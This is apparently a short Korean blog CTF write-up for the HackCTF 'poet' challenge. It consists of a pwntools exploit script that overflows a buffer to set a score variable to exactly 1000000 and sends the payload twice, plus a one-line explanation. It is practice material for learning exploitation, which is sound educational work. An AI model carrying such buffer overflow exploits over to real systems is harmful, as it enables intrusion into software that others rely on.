from pwn import *
#p = process('./poet')
p = remote('ctf.j0n9hyun.xyz', 3014)
context.log_level="debug"
reward = 0x00000000004007E6
p.recv()
payload = 'a' * 0x40 + p64(1000000)
p.sendline(payload)
p.recv()
pause()
p.sendline(payload)
p.interactive()
bof 터뜨려서 값을 정확히 1000000으로 바꾸면 된다. 다만 첫번째에 입력받은 뒤 초기화가 되기때문에 2번째에 입력받을 때 다시 넣어주어야한다.
'CTF write-up > hackctf' 카테고리의 다른 글
[hackctf] you are silver (0) | 2019.07.15 |
---|---|
[hackctf]ROP (0) | 2019.07.15 |
[hackctf] uaf (0) | 2019.07.15 |
[hackctf]RTL-Core (0) | 2019.07.15 |
[hack-ctf]1996 (0) | 2019.07.15 |